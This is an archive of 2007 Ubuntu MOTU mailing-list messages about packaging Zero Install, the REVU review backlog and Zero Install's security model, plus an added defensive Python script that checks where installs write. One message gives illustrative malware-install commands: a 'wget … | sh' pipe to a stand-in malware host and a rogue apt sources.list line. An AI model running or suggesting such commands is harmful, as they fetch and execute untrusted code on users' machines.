Re: Temporary REVU package storage
On Sat, 18 Aug 2007 11:06:09 -0400, Barry deFreese wrote:

[...]

Additionally, before you start demanding that I do things in the way that's easy for you, remember that I'm a volunteer. On a related note, I really don't think we need to make it easier to submit packages.

I have to agree with Scott here for the most part. You have to remember that community development works both ways. It's mighty easy to throw a package up on REVU/LP/wherever and walk away. It's another thing to get it packaged properly, make sure it meets Debian/Ubuntu standards wrt to licensing, packaging, dependencies, etc.

As a contributor, though, it's also hard to get your packaging done properly when the review feedback doesn't come until months after the upload. Maybe some of the people who gave up would have become good long-term maintainers if they'd had a good first experience.

I know I'm guilty of this too. As an upstream author, I don't have time to look at many of the patches people send me, and I never hear from them again. Back when I was a student (and had more time!) I replied to everything and built up a good developer community.

There are over 7,000 bugs filed against packages in Universe and Multiverse. Add to that hundreds of packages that possibly 1 individual thinks should be added to the archive. And this is all to be supported by a few dozen volunteer MOTUs? Many of whom have full-time RL jobs/school/wives/husbands/girlfriends/boyfriends/children, etc. Tell me how we are supposed to manage that?

You can't. But, these people still need a way to distribute their programs. If someone makes a package that's only useful to 10 Ubuntu users in the whole world, then the only recommended way to get it to them is to get it into Universe. Yet, the full review process doesn't make sense for such a small audience.

How about suggesting that these packagers first create a Zero Install package (http://0install.net) and maintain that on their own web-site for a while?
Then MOTU could *invite* authors of desirable packages to get them into Universe, rather than having people submit everything and the reviewers being too polite to turn them away?

This is similar to the development model used in the distributed version control systems: let people publish whatever they want on their own site and the 'official' maintainer pulls the bits they want.

If you don't have to be accepted by MOTU to distribute packages with security, updates, dependency handling, etc then there's less pressure to get every trivial package in Universe in the first place.

--
Dr Thomas Leonard http://rox.sourceforge.net
GPG: 9242 9807 C985 3C07 44A6 8B9A AE07 8280 59A5 3CC1

--
Ubuntu-motu mailing list
Ubuntu-motu@lists.ubuntu.com
Modify settings or unsubscribe at: https://lists.ubuntu.com/mailman/listinfo/ubuntu-motu
Re: zeroinstall-injector
On Fri, 12 Jan 2007 01:03:24 +0100, Jan Claeys wrote:

On Tuesday 09-01-2007 at 20:42 [timezone +], Thomas Leonard wrote:

I think you'll find the security model is rather different in Zero Install. In particular, it should never break a user account, since it only ever writes to the directories ~/.config/0install.net and ~/.cache/0install.net (which I presume Ubuntu isn't using for anything else ;-).

Do I understand your site correctly when I think that by default it's not possible to run Zero-Installed programs directly, but that it's required to start them using the '0launch' wrapper?

That's correct. You can create short-cuts to do this (0alias creates a shell script, AddApp creates a ROX app dir, Xfce's panel lets you drag links in, etc). However, it's always the user (or admin) who specifies any short-cut, not the package.

--
Dr Thomas Leonard http://rox.sourceforge.net
GPG: 9242 9807 C985 3C07 44A6 8B9A AE07 8280 59A5 3CC1
Re: zeroinstall-injector
On Wed, 10 Jan 2007 20:15:08 +0100, Dennis Kaarsemaker wrote:

On Wed, 2007-01-10 at 18:59 +, Thomas Leonard wrote:

In other words, Zero Install isn't a complete security system, but it's a necessary part of a solution.

imho it's not a solution at all. We work with source and can include things in the repositories. I don't think Ubuntu should go and make non-opensource programs easier to install.

I agree, Ubuntu shouldn't be making non-opensource programs easier to install. However, bringing the discussion back to Zero Install, here are some screenshots of a Zero Install user compiling a ROX applet from source:

http://rox.sourceforge.net/desktop/node/360

Note the 'Publish' button in the compile window. Not only do we let users modify the source, we let them redistribute it too. Yes, even unauthorised users.

Binary packages created this way automatically include information about the upstream sources used (versions, where to get them, digests) and a patch file, if the user made any changes. So, you should be able to recreate a build reliably if you want to modify it further.

(it's possible to remove these, of course, just as you can create a binary-only .deb, but it's open by default)

--
Dr Thomas Leonard http://rox.sourceforge.net
GPG: 9242 9807 C985 3C07 44A6 8B9A AE07 8280 59A5 3CC1
zeroinstall-injector
Hi,

I uploaded a package for Zero Install back in Oct 2006:

http://revu.tauware.de/details.py?upid=3885

I got a comment on Dec 20th to update the version number, which I've done. Do I need to tell someone about this (e.g. write to this list), or do reviewers get notified automatically? How long does the process normally take?

Thanks,

--
Dr Thomas Leonard http://rox.sourceforge.net
GPG: 9242 9807 C985 3C07 44A6 8B9A AE07 8280 59A5 3CC1
Re: zeroinstall-injector
On Tue, 09 Jan 2007 21:09:11 +0100, Reinhard Tartler wrote:

Thomas Leonard [EMAIL PROTECTED] writes:

I uploaded a package for Zero Install back in Oct 2006: http://revu.tauware.de/details.py?upid=3885 I got a comment on Dec 20th to update the version number, which I've done. Do I need to tell someone about this (e.g. write to this list), or do reviewers get notified automatically? How long does the process normally take?

Apart from the package quality (which I'd consider okay), I had a look what 0install actually does. It seems to me that 0install is similar to autopackage, a project I have strong reservations with. I fear that this tool has the potential to badly break a user account.

I think you'll find the security model is rather different in Zero Install. In particular, it should never break a user account, since it only ever writes to the directories ~/.config/0install.net and ~/.cache/0install.net (which I presume Ubuntu isn't using for anything else ;-).

Furthermore, I have some security concerns (who validates/authorizes a signature from one upstream).

The user installing the software, assisted by a hints database of known keys. While you can try to protect users from installing malware, at the end of the day it *is* their computer, and they have to make the final judgement.

Note that, unlike dpkg, Zero Install doesn't run any scripts as root, or copy files into /usr/bin, etc. So, from a security perspective you should compare a user installing with Zero Install vs installing to $HOME without it.

What happens, if a library is pulled via 0install, and later installed via apt-get?

APT will place one copy in /usr/lib, which will be used by programs installed by APT. Zero Install will place one (possibly identical) copy in ~/.cache/0install.net, which will be used by programs run through Zero Install. Having two copies may be inefficient, but nothing should break.

What do the others think? Should we have this in ubuntu?
Please let me know if you have any other concerns.

--
Dr Thomas Leonard http://rox.sourceforge.net
GPG: 9242 9807 C985 3C07 44A6 8B9A AE07 8280 59A5 3CC1
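Added example, not part of the original thread and not Zero Install's own code: one way to check the write-confinement claim made in the message above, by snapshotting a home directory before and after an install and listing every change outside ~/.config/0install.net and ~/.cache/0install.net. The function names and the sample home directory in `demo()` are constructed for illustration.

```python
import hashlib
import os
import tempfile
from pathlib import Path, PurePosixPath

# The two directories (relative to $HOME) that the message says are the only ones written to.
ALLOWED = (PurePosixPath(".config/0install.net"), PurePosixPath(".cache/0install.net"))

def snapshot(home):
    """Map every file under `home` (relative POSIX path) to a digest of its content."""
    state = {}
    for root, _dirs, files in os.walk(home):  # does not descend into directory symlinks
        for name in files:
            path = Path(root, name)
            # A symlink is recorded by its target, so a retargeted link counts as a change.
            data = os.readlink(path).encode() if path.is_symlink() else path.read_bytes()
            state[path.relative_to(home).as_posix()] = hashlib.sha256(data).hexdigest()
    return state

def is_allowed(rel, allowed=ALLOWED):
    """Compare whole path components, so '.cache/0install.net-old' does not match."""
    parts = PurePosixPath(rel).parts
    return any(parts[:len(a.parts)] == a.parts for a in allowed)

def writes_outside(before, after, allowed=ALLOWED):
    """Return the paths created, modified or deleted outside the allowed directories."""
    changed = {p for p in before.keys() | after.keys() if before.get(p) != after.get(p)}
    return sorted(p for p in changed if not is_allowed(p, allowed))

def demo():
    """Constructed scenario: a throwaway home directory and three simulated writes."""
    with tempfile.TemporaryDirectory() as tmp:
        home = Path(tmp)
        (home / ".bashrc").write_text("# original\n")
        before = snapshot(home)
        cache = home / ".cache/0install.net/implementations"
        cache.mkdir(parents=True)
        (cache / "sample").write_text("unpacked file\n")          # inside the cache: fine
        lookalike = home / ".cache/0install.net-old"
        lookalike.mkdir()
        (lookalike / "x").write_text("x\n")                        # look-alike directory
        (home / ".bashrc").write_text("# original\nalias a=b\n")  # outside: reported
        return writes_outside(before, snapshot(home))

if __name__ == "__main__":
    print(demo())
```

Run `snapshot()` on a test account's real home directory before and after an install to apply the same check outside the constructed scenario.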
Re: zeroinstall-injector
On Tue, 09 Jan 2007 22:41:56 +0100, Reinhard Tartler wrote:

Thomas Leonard [EMAIL PROTECTED] writes:

I think you'll find the security model is rather different in Zero Install. In particular, it should never break a user account, since it only ever writes to the directories ~/.config/0install.net and ~/.cache/0install.net (which I presume Ubuntu isn't using for anything else ;-).

Err, that's fair enough. My concern is rather, that code from unknown/unauthorized 3rd parties is executed, so the perfect way to inject trojan or other malware.

Well, here are three possible ways to install malware:

- Tell Zero Install to run http://malware.com/malware. Either ignore the warning about the key being unknown, or take the risk that the key isn't trust-worthy even if it's in the database.
  Result: User account compromised.

- Type:
  $ wget malware.com/malware -O -|sh
  Result: User account compromised.

- Edit /etc/apt/sources.list and add:
  deb http://malware.com/...
  Result: Root compromise.

As a malware author, why would you use Zero Install instead of one of the other methods? The second one is available to all users and at least as effective. Plus, your victims get no warnings about keys at all that way.

Note: I copied that wget example from a real web-page for some genuine software (but I changed the name ;-) - people are really forced to do this kind of thing at the moment!

It really depends why someone is trying to install the software:

- This game looks fun! Hmm... it's too hard to install. Let's install a different game from Ubuntu's approved repository instead!

vs

- I need this software to get my work done and Ubuntu doesn't have it.

or

- I'll keep trying until it's installed.

Furthermore, I have some security concerns (who validates/authorizes a signature from one upstream).

The user installing the software, assisted by a hints database of known keys.
While you can try to protect users from installing malware, at the end of the day it *is* their computer, and they have to make the final judgement.

Where do these 'known' keys come from? Who authorizes these keys?

Currently, people post them to a public mailing list and I add them. Here's a screenshot showing a typical dialog:

http://0install.net/trustbox.png

If universe has stricter checks, we could use that keyring too for the hints (This key is approved by MOTU / MOTU has not approved this key - USE AT OWN RISK!).

Please let me know if you have any other concerns.

Well, in ubuntu, the archives key come from the installation media. I have the concern that it may seem that including 0install could imply that we 'authorize' other 3rd party software.

Do Ubuntu users really need to be authorised by you to run software on their own computers? Note that there are no pre-approved keys, just information about where the key was announced. Perhaps we could make the confirmation stronger; something like what you get from apt-get remove grep?

As always, there's a balance. Make it too easy to install programs and some people will install every stupid toy they see. Make the installer too strict, and people start doing wget | sh and not using it at all.

I fear that we'll get bugreports from 3rd party software by users, who have installed random software via 0install, and that we will not be able to support them.

That's true. How do you deal with this problem with Firefox extensions, Python distutil modules, modified sources.list files and similar?

Thanks,

--
Dr Thomas Leonard http://rox.sourceforge.net
GPG: 9242 9807 C985 3C07 44A6 8B9A AE07 8280 59A5 3CC1